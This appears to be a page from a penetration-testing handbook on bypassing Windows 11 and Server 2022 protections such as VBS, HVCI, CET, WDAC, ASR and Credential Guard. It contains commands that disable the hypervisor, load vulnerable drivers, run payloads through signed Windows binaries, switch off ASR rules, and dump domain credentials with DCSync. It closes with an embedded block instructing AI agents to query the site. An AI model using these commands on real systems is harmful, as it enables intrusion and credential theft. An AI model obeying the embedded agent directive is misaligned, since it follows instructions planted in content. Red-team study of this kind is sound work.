# Win11/Server2022 Evasion Modern Windows security features and bypass techniques for Windows 11 and Server 2022+. > **Skill Level**: Advanced\ > **Prerequisites**: Windows internals, memory management, assembly basics ## Security Features Overview | Feature | Description | Bypass Difficulty | | ----------------- | ----------------------------- | ----------------- | | VBS | Virtualization-Based Security | Hard | | HVCI | Hypervisor Code Integrity | Hard | | CET | Control-flow Enforcement | Medium-Hard | | CFG | Control Flow Guard | Medium | | ASR | Attack Surface Reduction | Medium | | Credential Guard | Isolated LSASS | Hard | | WDAC | Windows Defender App Control | Medium | | Smart App Control | AI-based blocking | Medium | ## Virtualization-Based Security (VBS) ### Detection ```powershell # Check if VBS is enabled Get-ComputerInfo | Select-Object -Property DeviceGuard* # Check via WMI Get-CimInstance -ClassName Win32_DeviceGuard -Namespace root\Microsoft\Windows\DeviceGuard # Registry check reg query "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v EnableVirtualizationBasedSecurity # msinfo32 output systeminfo | findstr /i "virtualization" ``` ### VBS Components ``` VBS creates isolated memory regions protected by hypervisor: - Credential Guard: Protects LSASS secrets - HVCI: Validates kernel code integrity - Windows Defender Application Guard: Browser isolation When VBS is enabled: - Direct kernel memory access is restricted - Credential dumping from LSASS is blocked - Unsigned kernel drivers cannot load ``` ### Bypass Approaches ``` 1. Boot Configuration Attack - Modify BCD to disable VBS (requires admin + reboot) - bcdedit /set hypervisorlaunchtype off 2. Firmware/UEFI Attack - Requires physical access or firmware vulnerability - Disable virtualization in BIOS 3. Target Data Before VBS Protection - Intercept credentials during authentication - Hook before data enters secure enclave 4. Exploit VBS Implementation Bugs - Research ongoing for hypervisor escapes ``` ## Hypervisor Code Integrity (HVCI) ### Detection ```powershell # Check HVCI status Get-ProcessMitigation -System | Select-Object -ExpandProperty ASLR # Via Device Guard settings (Get-CimInstance -ClassName Win32_DeviceGuard -Namespace root\Microsoft\Windows\DeviceGuard).SecurityServicesRunning # 1 = Credential Guard, 2 = HVCI ``` ### Impact on Attacks ``` HVCI blocks: - Loading unsigned kernel drivers - Kernel code modification - Many rootkit techniques Still possible: - Signed vulnerable drivers (BYOVD) - User-mode attacks - Living-off-the-land techniques ``` ### BYOVD (Bring Your Own Vulnerable Driver) ```powershell # Use known vulnerable signed driver # Example: Dell dbutil_2_3.sys (CVE-2021-21551) # Load vulnerable driver sc create evildriver binPath= "C:\path\to\vulnerable.sys" type= kernel sc start evildriver # Use driver's vulnerability to: # - Read/write kernel memory # - Disable security features # - Load unsigned code # Known vulnerable drivers: # - dbutil_2_3.sys (Dell) # - ASUS drivers (CVE-2019-15125) # - Gigabyte drivers # - Capcom.sys # Tool: KDU (Kernel Driver Utility) # https://github.com/hfiref0x/KDU ``` ## Control-flow Enforcement Technology (CET) ### What CET Protects ``` CET has two components: 1. Shadow Stack - Protects return addresses 2. Indirect Branch Tracking (IBT) - Validates call targets Shadow Stack: - Hardware-backed return address protection - Separate stack stores return addresses - Mismatch = exception Impact on ROP: - Traditional ROP chains fail - Return addresses must match shadow stack ``` ### Detection ```powershell # Check if process has CET enabled Get-ProcessMitigation -Name notepad.exe | Select CET* # Check CPU support (Get-WmiObject Win32_Processor).Caption # Look for CET-capable Intel 11th gen+ or AMD Zen 3+ ``` ### Bypass Techniques ``` 1. JOP (Jump-Oriented Programming) - Use JMP gadgets instead of RET - Doesn't touch shadow stack - More complex to build chains 2. COP (Call-Oriented Programming) - Use CALL/JMP sequences - Harder but possible 3. Target Non-CET Processes - Legacy applications - 32-bit processes (less coverage) 4. Disable CET for Process - If admin, can modify process mitigation policy - SetProcessMitigationPolicy() 5. Stack Pivoting Before CET Init - Attack during process startup - Before CET is fully enabled ``` ## Control Flow Guard (CFG) ### How CFG Works ``` CFG validates indirect call targets: 1. Compiler creates bitmap of valid call targets 2. Runtime validates calls against bitmap 3. Invalid target = exception Protected: Indirect calls (call [rax]) Not Protected: Direct calls, returns (use CET) ``` ### Bypass Techniques ```c // 1. Call existing valid functions with controlled arguments // Find function in CFG bitmap that does what you need // 2. Overwrite CFG bitmap // Requires arbitrary write primitive // Bitmap at ntdll!LdrSystemDllInitBlock+0x70 // 3. Use non-CFG modules // Older DLLs may not have CFG // JIT-compiled code regions // 4. Return-oriented attacks (before CET) // CFG doesn't protect returns // 5. Data-only attacks // Corrupt data, not control flow ``` ```powershell # Check if module has CFG dumpbin /headers module.dll | findstr "Guard" ``` ## Windows Defender Application Control (WDAC) ### Detection ```powershell # Check WDAC policy Get-CimInstance -ClassName MSFT_MpComputerStatus -Namespace root\Microsoft\Windows\Defender # Check CI policies Get-CIPolicy -FilePath C:\Windows\System32\CodeIntegrity\SIPolicy.p7b ``` ### Bypass Techniques ```powershell # 1. LOLBins - Living Off The Land Binaries # Use Microsoft-signed binaries # https://lolbas-project.github.io/ # MSBuild (if allowed) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe payload.csproj # InstallUtil C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U payload.dll # CMSTP cmstp.exe /ni /s payload.inf # 2. Signed vulnerable applications # Use legitimate signed apps with vulnerabilities # 3. Script interpreters (if allowed) # PowerShell in Constrained Language Mode bypass # Python, Perl if installed # 4. DLL side-loading # Hijack DLL loaded by allowed application ``` ## Attack Surface Reduction (ASR) ### ASR Rules ```powershell # Check enabled ASR rules Get-MpPreference | Select-Object AttackSurfaceReductionRules_Ids, AttackSurfaceReductionRules_Actions # Common rules: # - Block Office macro code # - Block executable content from email # - Block process creation from Office # - Block credential stealing from LSASS ``` ### Bypass Approaches ``` 1. Rule-specific bypasses - Each rule has edge cases - Test specific rule implementation 2. Parent process spoofing - Make malicious process appear as allowed parent 3. Use unprotected applications - Not all apps covered by rules 4. Disable ASR (requires admin) Set-MpPreference -AttackSurfaceReductionRules_Ids -AttackSurfaceReductionRules_Actions Disabled ``` ## Credential Guard Bypass ### When Enabled ``` Credential Guard protects: - NTLM hashes - Kerberos TGTs/session keys - Derived domain credentials NOT protected: - Credentials before they enter LSASS - Cached credentials (DPAPI protected) - Credentials for local accounts ``` ### Attack Alternatives ```powershell # 1. Keylogging - capture before protection # Hook credential providers # 2. Token manipulation # Tokens are still in normal memory Invoke-TokenManipulation # 3. Kerberos ticket attacks # Request new tickets, don't steal existing Rubeus.exe asktgt /user:admin /password:pass # 4. DCSync (if DA) # Still works - network-based mimikatz # lsadump::dcsync /domain:corp.local /user:krbtgt # 5. Target unprotected credentials # Service account passwords in registry # Cached credentials on disk # Browser passwords ``` ## Smart App Control ### What It Does ``` Windows 11 22H2+ feature: - AI/ML-based application reputation - Blocks untrusted executables - Three modes: On, Evaluation, Off ``` ### Bypass Approaches ``` 1. Signed binaries (EV certificate) 2. LOLBins (Microsoft-signed) 3. In-memory execution (if possible) 4. Abuse trusted applications 5. Wait for evaluation mode to turn off ``` ## Process Injection (Modern) ### Techniques That Still Work ```c // 1. Thread Hijacking with hardware breakpoints // Set HWBP, wait for trigger, modify context // 2. Module Stomping // Overwrite legitimate DLL in memory // Avoid creating new executable memory // 3. Transacted Hollowing // Use NTFS transactions for cleaner hollowing // 4. Process Ghosting // Create file, mark for deletion, map as image // File disappears but process runs ``` ### Tools ```bash # Process Ghosting https://github.com/hasherezade/process_ghosting # Module Stomping https://github.com/countercept/ModuleStomping # Various injection techniques https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell ``` ## Detection Evasion Summary | Attack | Pre-Win11 | Win11 with VBS | | ------------------ | --------- | -------------- | | Mimikatz sekurlsa | ✓ | ✗ (Cred Guard) | | Kernel driver load | ✓ | ✗ (HVCI) | | ROP chains | ✓ | ✗ (CET) | | Unsigned code | ✓ | ✗ (WDAC) | | BYOVD | ✓ | ✓ | | Token manipulation | ✓ | ✓ | | LOLBins | ✓ | ✓ | | DCSync | ✓ | ✓ | ## Related Topics * [RT/EDR Evasion](/others/rt-edr.md) - General evasion techniques * [Windows Post-Exploitation](/post-exploitation/windows.md) - Windows attacks * [Active Directory](/post-exploitation/windows/ad.md) - AD attacks --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://www.pentest-book.com/post-exploitation/windows/win11-evasion.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.